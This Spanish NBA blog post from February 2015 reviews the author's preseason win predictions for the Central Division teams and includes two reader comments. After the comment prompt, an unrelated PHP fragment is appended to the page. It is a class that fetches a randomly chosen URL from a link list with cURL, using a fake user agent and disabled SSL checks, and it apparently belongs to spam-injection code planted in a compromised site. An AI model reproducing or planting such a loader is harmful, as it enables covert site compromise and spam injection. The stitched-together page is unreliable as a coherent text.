Revisando los pronósticos: Central

13 de February de 2015 por TheDeerHunter

Tras revisar los pronósticos de la Atlantic, seguimos con nuestro ejercicio de autocrítica recuperando los análisis que a principio de la campaña hicimos sobre la interensatísima Central Division.

Chicago Bulls

Pronóstico Octubre 2014: Con Rose sano: 58 victorias, primer clasificado en la Conferencia Este.

Probabilidad acierto: Media-Baja

Calificación pronóstico: C-

Han ocupado hasta ahora la primera plaza de la división pero parece difícil que la puedan conservar al final de la regular. Aunque las 58 victorias aún son posibles, el liderato de la conferencia es prácticamente inalcanzable para ellos. Tal y como han venido jugando deberían darse con un canto en los dientes por disputar la primera ronda con ventaja campo, tratando de recuperar hasta entonces la imagen de equipo serio y rocoso que siempre fueron. Los Bulls han mejorado significativamente su nivel ofensivo con la eclosión de Jimmy Butler y una fabulosa adaptación de Pau Gasol, por contra han bajado tremendamente sus prestaciones defensivas, con dos baluartes como Noah y Gibson excesivamente perdidos. El balance final deberá hacerse en postemporada, cuando quedará de manifiesto si tanta espera a Derrick Rose habrá merecido la pena. Entonces tendrá que mostrar mucha más regularidad de lo que ha venido haciendo, al igual que el equipo en global.

Cleveland Cavaliers

Pronóstico Octubre 2014: 54 victorias, 2º clasificado Conferencia Este.

Probabilidad acierto: Media-Alta

Calificación pronóstico: A

Alta precisión en ese 2º puesto y el balance que parecía predecir la que iba a caer inicialmente en Cleveland en esta segunda etapa de King James. El comienzo no pudo ser mucho peor. El nuevo Big Three, completamente desconectado del resto y un poco también de ellos mismos. De milagro David Blatt pudo comerse el turrón. Por una vez se puede decir que una grave lesión ha causado un efecto altamente positivo, pues la baja de Varejao precipitó la llegada de Mozgov, Smith y Shumpert, así como la salida de Waiters (que ya era hora) y la imagen cambió como de la noche al día. En cualquier caso está bien que los Cavs anden afinándose ahora, pero a este tipo de equipos sólo les vale estar bien a la hora de la verdad y, como dijimos, su exigencia mínima (muy mínima) son las finales del Este… o habrá marejada gorda.

Milwaukee Bucks

Pronóstico Octubre 2014: Superarán a Philadephia sin ninguna duda y es posible que se aprovechen de algún equipo con debates internos como puede ser Boston (caso Rondo) para pasarlos. 13º de la conferencia Este pero lejos de PO con 26 victorias.

Probabilidad acierto: Nula

Calificación pronóstico: F

No deberíamos hacer sangre. Los Bucks son oficialmente una de las revelaciones de la 2014/15. Salvo catástrofe entrarán en playoffs y apuntan a cerrar por encima del 50% de victorias. De no haber tanta competencia este año Jason Kidd podría haber entrado en las quinielas para el CoY. Un altar es lo que le deberían haber puesto por haber logrado que esta gente defienda y por haber sacado rendimiento a alguna de las “perlas” que abundan en su plantilla. Sólo hay que dar un ligero repaso a algunos análisis referidos a los Bucks de los últimos años para ponderar la labor del técnico. La lástima es la grave lesión de Jabari y que exista un fulano como Larry Sanders que no sea capaz de darse cuenta de lo privilegiado que es.

Detroit Pistons

Pronóstico Octubre 2014: No descartaríamos su entrada en la postemporada debido a la aparente flaqueza de equipos como Indiana o Brooklyn pero optando una vía más realista quedarán cerca de PO (es el Este) con 36 victorias.

Probabilidad acierto: Media-Baja

Calificación pronóstico: B-

Mucha mala leche metiendo el dedo en la llaga de que con 36 victorias se puede quedar cerca de PO en el Este. Ni Nostradamus podría adivinar que la solución de todos los males de los Pistons era tirar a Josh Smith a patadas. Como agua de mayo, oiga, y de repente todo volvía a su sitio y sus mejores jugadores se parecían a lo que alguna vez fueron. La verdad es que en ese aspecto la medalla hay que colgársela a SVG pues no es nada fácil tomar una decisión así, aunque también es cierto que desde el minuto 1 del fichaje del susodicho todos advertimos que era un error. Rectificar es de sabios, pero la diosa fortuna no mira méritos. Se rompió Jennings cuando había recuperado su mejor versión y con él se fueron muchas esperanzas. El equipo afronta este tramo final con dignidad pero será difícil que alcancen esas 36 que les dimos. Lo cerca que se queden de PO, con esa cifra, dependerá de otros.

Indiana Pacers

Pronóstico Octubre 2014: 35 victorias, 8º o 9º puesto de la conferencia Este.

Probabilidad acierto: Media

Calificación pronóstico: B

Había que tener mucha fe tanto en el pundonor de los Pacers como en la falta de competitividad en el Este para apostar al principio de liga que iban a mirar playoffs de cerca. Algunos lo vimos más cuestión de corazón que de cabeza en el análisis. La recuperación de George Hill, el balance reciente y el errático comportamiento de los últimos aspirantes en la conferencia invita al optimismo. Con el 50% por el que se vienen moviendo últimamente clavarían esas 35 victorias, luego habrá que ver dónde está el corte. El resumen de todo lo podemos encontrar en esta frase premonitoria: “defendiendo dignamente y jugando de forma comprometida se puede uno clasificar para los PO de la conferencia” Quede como quede el asunto la apuesta fue muy atinada, sin ninguna duda. Veremos si al final esa hipotética vuelta de George este curso termina en gesta o en un affer parecido al Rose returns.

Comenta

2 comentarios a esta entrada

  1. Azabel dice:
    #1

    bueno debo quebrar una lanza para mi analisis que no contemplaba de ninguna manera las lesiones simultaneas de Hill y West, incluido Watson de a momentos
    el arranque fue fatidico pero con el correr de los juegos se moveran hasta al menos el 9no puesto, lo sostengo

      Citar

  2. txusma dice:
    #2

    Azabel:
    bueno debo quebrar una lanza para mi analisis que no contemplaba de ninguna manera las lesiones simultaneas de Hill y West, incluido Watson de a momentos
    el arranque fue fatidico pero con el correr de los juegos se moveran hasta al menos el 9no puesto, lo sostengo

    Pues ojo que se habla de que Paul George puede volver en marzo. Y la octava posición la tienen muy cerca.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>